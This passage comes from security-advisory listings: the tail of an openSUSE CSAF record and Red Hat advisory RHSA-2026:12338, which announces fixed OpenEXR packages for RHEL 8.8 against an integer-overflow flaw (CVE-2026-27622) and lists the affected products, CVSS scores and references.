"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-27622"
}
]
}
RHSA-2026:12338
Vulnerability from csaf_redhat - Published: 2026-04-30 16:02 - Updated: 2026-06-30 04:26Summary
Red Hat Security Advisory: OpenEXR security update
Severity
Important
Notes
Topic: An update for OpenEXR is now available for Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions and Red Hat Enterprise Linux 8.8 Telecommunications Update Service.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light & Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format.
Security Fix(es):
* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
7.4 (High)
Affected products
Fixed
22 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
9 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions and Red Hat Enterprise Linux 8.8 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12338",
"url": "https://access.redhat.com/errata/RHSA-2026:12338"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12338.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-06-30T04:26:53+00:00",
"generator": {
"date": "2026-06-30T04:26:53+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.0"
}
},
"id": "RHSA-2026:12338",
"initial_release_date": "2026-04-30T16:02:14+00:00",
"revision_history": [
{
"date": "2026-04-30T16:02:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T16:02:14+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-30T04:26:53+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_e4s:8.8::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_tus:8.8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_8.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_8.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_8.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_8.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_8.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_8.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_8.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_8.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_8.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
